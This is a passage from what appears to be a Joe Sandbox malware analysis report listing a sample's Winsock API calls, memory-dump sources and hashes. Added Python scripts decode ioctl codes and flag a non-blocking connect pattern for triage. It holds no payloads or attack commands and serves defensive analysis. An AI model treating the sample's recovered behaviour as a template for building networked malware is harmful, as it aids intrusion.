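def _iow(group, num, size=4): return IOC_IN | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | num
def _wsaio(direction, family, num): return direction | family | num

# Short, assumed-useful subset of winsock2.h / mstcpip.h codes, built from the macros above
KNOWN_IOCTLS = {
    _iow("f", 126): "FIONBIO", _ior("f", 127): "FIONREAD", _iow("f", 125): "FIOASYNC",
    _ior("s", 7): "SIOCATMARK",
    _ior("t", 123): "SIO_IDEAL_SEND_BACKLOG_QUERY", _io("t", 122): "SIO_IDEAL_SEND_BACKLOG_CHANGE",
    _wsaio(IOC_IN, IOC_VENDOR, 1): "SIO_RCVALL", _wsaio(IOC_IN, IOC_VENDOR, 4): "SIO_KEEPALIVE_VALS",
    _wsaio(IOC_INOUT, IOC_WS2, 6): "SIO_GET_EXTENSION_FUNCTION_POINTER",
}
SOL_SOCKET, IPPROTO_TCP = 0xFFFF, 6
LEVELS = {SOL_SOCKET: "SOL_SOCKET", IPPROTO_TCP: "IPPROTO_TCP"}
SOCKOPTS = {
    (SOL_SOCKET, 0x0004): "SO_REUSEADDR", (SOL_SOCKET, 0x0008): "SO_KEEPALIVE",
    (SOL_SOCKET, 0x0080): "SO_LINGER", (SOL_SOCKET, 0x1001): "SO_SNDBUF",
    (SOL_SOCKET, 0x1002): "SO_RCVBUF", (SOL_SOCKET, 0x1005): "SO_SNDTIMEO",
    (SOL_SOCKET, 0x1006): "SO_RCVTIMEO", (IPPROTO_TCP, 0x0001): "TCP_NODELAY",
}

def _to_int(v) -> int:
    """Accept an int or the report's hex text; negatives such as '-00000028' wrap to 32 bits."""
    return (int(v, 16) if isinstance(v, str) else v) & 0xFFFFFFFF

@dataclass
class Ioctl:
    code: int
    direction: str
    family: str
    group: Optional[str]  # BSD-style group letter ('f', 's', 't'); None for _WSAIO* codes
    number: int
    size: int             # parameter size carried by BSD-style codes, 0 otherwise
    name: Optional[str]

def decode_ioctl(raw) -> Ioctl:
    code = _to_int(raw)
    direction = DIRECTIONS.get(code & 0xE0000000, "?")
    fam = code & 0x18000000
    if fam == IOC_UNIX:  # classic layout: size << 16 | group << 8 | number
        group, number, size = chr((code >> 8) & 0xFF), code & 0xFF, (code >> 16) & IOCPARM_MASK
    else:                # Winsock2 layout: family bits | 27-bit number
        group, number, size = None, code & 0x07FFFFFF, 0
    return Ioctl(code, direction, FAMILIES[fam], group, number, size, KNOWN_IOCTLS.get(code))

def decode_sockopt(level, optname):
    level, optname = _to_int(level), _to_int(optname)
    return LEVELS.get(level, hex(level)), SOCKOPTS.get((level, optname), hex(optname))

def decode_wsa_version(word):
    w = _to_int(word)    # MAKEWORD(major, minor): major in the low byte
    return w & 0xFF, (w >> 8) & 0xFF

_API_LINE = re.compile(r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\)(?:,\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?")

def parse_api_record(line: str):
    m = _API_LINE.match(line.strip().lstrip("•").strip())
    if not m:
        raise ValueError(f"not an API record: {line!r}")
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return m.group("api"), args, m.group("ref")

def _arg(args, idx):
    """Positional argument as int, or None where the report prints '?' (value not recovered)."""
    return None if idx >= len(args) or args[idx] == "?" else _to_int(args[idx])

def resolve_api_record(line: str) -> dict:
    api, args, ref = parse_api_record(line)
    out = {"api": api, "ref": ref}
    if api in ("WSAIoctl", "ioctlsocket"):  # (s, dwIoControlCode, ...) / (s, cmd, argp)
        code = _arg(args, 1)
        if code is not None:
            d = decode_ioctl(code)
            out["ioctl"] = d.name or f"unknown({d.direction},{d.family},{d.group},{d.number})"
        if api == "ioctlsocket":
            out["argp"] = _arg(args, 2)
        else:
            out["out_size"] = _arg(args, 5)  # cbOutBuffer
    elif api == "setsockopt":  # (s, level, optname, optval, optlen)
        level, opt = _arg(args, 1), _arg(args, 2)
        if level is not None and opt is not None:
            out["level"], out["optname"] = decode_sockopt(level, opt)
        out["optlen"] = _arg(args, 4)
    elif api == "WSAStartup":  # (wVersionRequested, lpWSAData)
        ver = _arg(args, 0)
        if ver is not None:
            out["version"] = decode_wsa_version(ver)
    return out

if __name__ == "__main__":
    # Records copied from the API lines of this report
    for rec in ("WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0040935D",
                "setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00409389",
                "WSAStartup.WS2_32(00000202), ref: 003ED65A",
                "ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0049ABE4"):
        print(resolve_api_record(rec))
```

Codes that fall outside the short name table are still decoded structurally (direction, family, group letter and number), which is what is needed to look an unfamiliar value up in the SDK headers; an `unknown(...)` result therefore means "not in the table", not "malformed".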
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: closesocket
                                                          • String ID: FD %s:%d sclose(%d)
                                                          • API String ID: 2781271927-3116021458
                                                          • Opcode ID: 4c7a34435757904e3e87e7f357fa9b1f4f43aae5e69d4ee1ebd7246224353323
                                                          • Instruction ID: fc4bbba3fc881059f699ae94004adcdce5defff1a526ce37c3c36679765c1978
                                                          • Opcode Fuzzy Hash: 4c7a34435757904e3e87e7f357fa9b1f4f43aae5e69d4ee1ebd7246224353323
                                                          • Instruction Fuzzy Hash: FED05E339092226B852169997D49C4BABA8EEC6F60F470C6AF9406B304E1209C0083E2
                                                          APIs
                                                          • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0049B29E,?,00000000,?,?), ref: 0049B0BA
                                                          • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00483C41,00000000), ref: 0049B0C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastconnect
                                                          • String ID:
                                                          • API String ID: 374722065-0
                                                          • Opcode ID: 436e9539e714c680c300f1594cad90be884d6a48816719d48bd84e97c6c3a21a
                                                          • Instruction ID: fa4b7f0dd59b9328ec5e6bad558d82f49312e0824f2b1f6bb077626bf691b735
                                                          • Opcode Fuzzy Hash: 436e9539e714c680c300f1594cad90be884d6a48816719d48bd84e97c6c3a21a
                                                          • Instruction Fuzzy Hash: 0C012D322042009FCE205A659D44E6BB795FF49764F040735F578532D0D72ADD104792
                                                          APIs
                                                          • gethostname.WS2_32(00000000,00000040), ref: 00484AA5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: gethostname
                                                          • String ID:
                                                          • API String ID: 144339138-0
                                                          • Opcode ID: 823611e77350796d7f232a196b0de87f00ee8d24be588e905378da33675341da
                                                          • Instruction ID: 602b5d85aaef336455b5e997cf8b0de30a5e7806ad5c02cdcdb7c04ba41e65ab
                                                          • Opcode Fuzzy Hash: 823611e77350796d7f232a196b0de87f00ee8d24be588e905378da33675341da
                                                          • Instruction Fuzzy Hash: F351D1B06043028BE730AB65DD4972B76D4AF85319F040D3EE98A8B7D1E77CE844C70A
                                                          APIs
                                                          • getsockname.WS2_32(?,?,00000080), ref: 0049AFD0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID:
                                                          • API String ID: 3358416759-0
                                                          • Opcode ID: 97521ee73d6ae5f960d416d1ef7371f7bc3377430ca05d9adbd30700cea46589
                                                          • Instruction ID: 27db81ccd80169b2f705076b9902dbe4af493d53d908b273735161ab7fb19732
                                                          • Opcode Fuzzy Hash: 97521ee73d6ae5f960d416d1ef7371f7bc3377430ca05d9adbd30700cea46589
                                                          • Instruction Fuzzy Hash: 4511967080878496EB268F1CD8027E6B7F4EFD0328F109619E59942550F7365AD68BC2
                                                          APIs
                                                          • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0049A97E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: send
                                                          • String ID:
                                                          • API String ID: 2809346765-0
                                                          • Opcode ID: af8bfcefd09242e38988b06e5357dd312f3598aeeb6f331bb1cbb5a5684c4d41
                                                          • Instruction ID: b2fbf559b2816738e5bb35baf4afffb86380fe4f29511873f3a00fe856d0d30a
                                                          • Opcode Fuzzy Hash: af8bfcefd09242e38988b06e5357dd312f3598aeeb6f331bb1cbb5a5684c4d41
                                                          • Instruction Fuzzy Hash: 930167B17117109FC7148F15DC45B56BBA5FF84720F0A8569E9981B361C331AC159BD1
                                                          APIs
                                                          • socket.WS2_32(?,0049B280,00000000,-00000001,00000000,0049B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0049AF67
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID:
                                                          • API String ID: 98920635-0
                                                          • Opcode ID: 691317ad737479a467c7f28cd8d4c302911ba59e1620a14775621617ef0e9e0a
                                                          • Instruction ID: d9b5b2092ec593f129667aa45f09b1b68783599bc02afb3feceaaeb493d37488
                                                          • Opcode Fuzzy Hash: 691317ad737479a467c7f28cd8d4c302911ba59e1620a14775621617ef0e9e0a
                                                          • Instruction Fuzzy Hash: 26E0E5B6A053256BD554DB18F8449ABF769EFC4B10F055A59B85457308C330AC548BE2
                                                          APIs
                                                          • closesocket.WS2_32(?,00499422,?,?,?,?,?,?,?,?,?,?,?,w3H,00864C60,00000000), ref: 0049B04D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: closesocket
                                                          • String ID:
                                                          • API String ID: 2781271927-0
                                                          • Opcode ID: b9ac983734a01becffd391b9fbd8799930b2c2b0b41d5fbb11d313f2266995ed
                                                          • Instruction ID: d06c6cc8a1888acac32d45407779710da853b992bb569c9ac69119eec76ec0f5
                                                          • Opcode Fuzzy Hash: b9ac983734a01becffd391b9fbd8799930b2c2b0b41d5fbb11d313f2266995ed
                                                          • Instruction Fuzzy Hash: CCD0123470020157CE249A14DAC4A577A6BBFD1710FA9CB78E42C4A665D73FDC47C681
                                                          APIs
                                                          • ioctlsocket.WS2_32(?,8004667E,?,?,0040AF56,?,00000001), ref: 004367FB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: ioctlsocket
                                                          • String ID:
                                                          • API String ID: 3577187118-0
                                                          • Opcode ID: b25159a185e9837f3a33708988dd61ab8002254cec396c9374f8c808dce4d110
                                                          • Instruction ID: 5e253e6f4d17d3cce8d5f90fa08ae5605b364ea2c1047a18a1663653463cc68a
                                                          • Opcode Fuzzy Hash: b25159a185e9837f3a33708988dd61ab8002254cec396c9374f8c808dce4d110
                                                          • Instruction Fuzzy Hash: 3FC012F1119200AFC60C4724D955A2EB6D8DB44255F12591CB04692190EA349450CA1A
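The ioctlsocket call listed above passes command 8004667E, which is the Winsock FIONBIO code (put the socket into non-blocking mode). Read together with the connect call at 0049B0BA that is immediately followed by WSAGetLastError at 0049B0C1, the most likely reading is the ordinary non-blocking connect idiom, where connect returns SOCKET_ERROR with WSAEWOULDBLOCK and the caller checks the error code before waiting for completion; the listing alone does not show which error values the caller accepts. As an added example (not Joe Sandbox code and not code recovered from the sample), the following Python parses the per-function API lines as they are rendered on this page, decodes the ioctl command, orders the call sites by address so the Winsock helper cluster around 0049Axxx/0049Bxxx becomes visible, and flags that idiom. The sample lines are copied from this report; the FIONBIO/FIONREAD/SIOCATMARK constants are the winsock2.h values; the 16-byte adjacency window used to pair connect with WSAGetLastError is an assumed heuristic, not something the report states.

```python
"""Parse the 'API.Module(args), ref: addr' lines of a Joe Sandbox function listing.

Added example for this report; it is not Joe Sandbox code. It only consumes the
text as rendered on the page (the fuzzy hashes and dump identifiers are ignored).
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample input: the WS2_32 call lines copied verbatim from this report,
# with the surrounding Memory Dump Source / Similarity fields left out.
SAMPLE_LINES = """
• closesocket.WS2_32(?,00499422,?,?,?,?,?,?,?,?,?,?,?,w3H,00864C60,00000000), ref: 0049B04D
• connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0049B29E,?,00000000,?,?), ref: 0049B0BA
• WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00483C41,00000000), ref: 0049B0C1
• gethostname.WS2_32(00000000,00000040), ref: 00484AA5
• getsockname.WS2_32(?,?,00000080), ref: 0049AFD0
• send.WS2_32(?,?,?,00000000,00000000,?), ref: 0049A97E
• socket.WS2_32(?,0049B280,00000000,-00000001,00000000,0049B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0049AF67
• ioctlsocket.WS2_32(?,8004667E,?,?,0040AF56,?,00000001), ref: 004367FB
"""

# One call line: optional bullet, API name, module, argument list, 8-hex-digit call site.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Winsock ioctlsocket command codes as defined in winsock2.h.
IOCTL_NAMES = {0x8004667E: "FIONBIO", 0x4004667F: "FIONREAD", 0x40047307: "SIOCATMARK"}
FIONBIO = 0x8004667E

# Assumed heuristic window (bytes) between a connect call site and the
# WSAGetLastError call that checks its result; not a value from the report.
ERROR_CHECK_WINDOW = 16


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]  # raw argument text as printed; '?' means Joe Sandbox could not resolve it
    ref: int         # virtual address of the call site


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Return an ApiCall for a call line, or None for any other line of the listing."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))


def parse_report(text: str) -> List[ApiCall]:
    return [c for c in (parse_api_line(ln) for ln in text.splitlines()) if c is not None]


def arg_int(raw: str) -> Optional[int]:
    """Joe Sandbox prints 32-bit values as hex and negatives as '-' + hex; '?' is unknown."""
    if not raw or raw.startswith("?"):
        return None
    try:
        return -int(raw[1:], 16) if raw.startswith("-") else int(raw, 16)
    except ValueError:  # stack garbage such as 'w3H'
        return None


def decode_ioctl(cmd: int) -> str:
    return IOCTL_NAMES.get(cmd & 0xFFFFFFFF, "unknown(0x%08X)" % (cmd & 0xFFFFFFFF))


def call_site_layout(calls: List[ApiCall]) -> List[Tuple[str, str]]:
    """(api, call-site address) pairs ordered by address; clusters show shared wrappers."""
    return [(c.api, "%08X" % c.ref) for c in sorted(calls, key=lambda c: c.ref)]


def nonblocking_connect_pattern(calls: List[ApiCall]) -> bool:
    """True if FIONBIO is set somewhere and a connect call site is directly followed
    by a WSAGetLastError call site within ERROR_CHECK_WINDOW bytes."""
    sets_fionbio = any(
        c.api == "ioctlsocket" and len(c.args) > 1 and arg_int(c.args[1]) == FIONBIO for c in calls
    )
    by_addr = sorted(calls, key=lambda c: c.ref)
    checks_error = any(
        a.api == "connect" and b.api == "WSAGetLastError" and 0 < b.ref - a.ref <= ERROR_CHECK_WINDOW
        for a, b in zip(by_addr, by_addr[1:])
    )
    return sets_fionbio and checks_error


if __name__ == "__main__":
    found = parse_report(SAMPLE_LINES)
    for api, addr in call_site_layout(found):
        print(addr, api)
    for c in found:
        if c.api == "ioctlsocket":
            print("ioctlsocket command:", decode_ioctl(arg_int(c.args[1]) or 0))
    print("non-blocking connect idiom:", nonblocking_connect_pattern(found))
```

Running the block on the copied lines prints the call sites in address order (ioctlsocket at 004367FB, gethostname at 00484AA5, then the send/socket/getsockname/closesocket/connect/WSAGetLastError cluster between 0049A97E and 0049B0C1), decodes the ioctl command as FIONBIO, and reports the idiom as present. Treat the result as a triage hint: arguments shown as `?` are unresolved by the sandbox, and the same pairing would also fire on a blocking connect whose caller merely logs the error.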
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
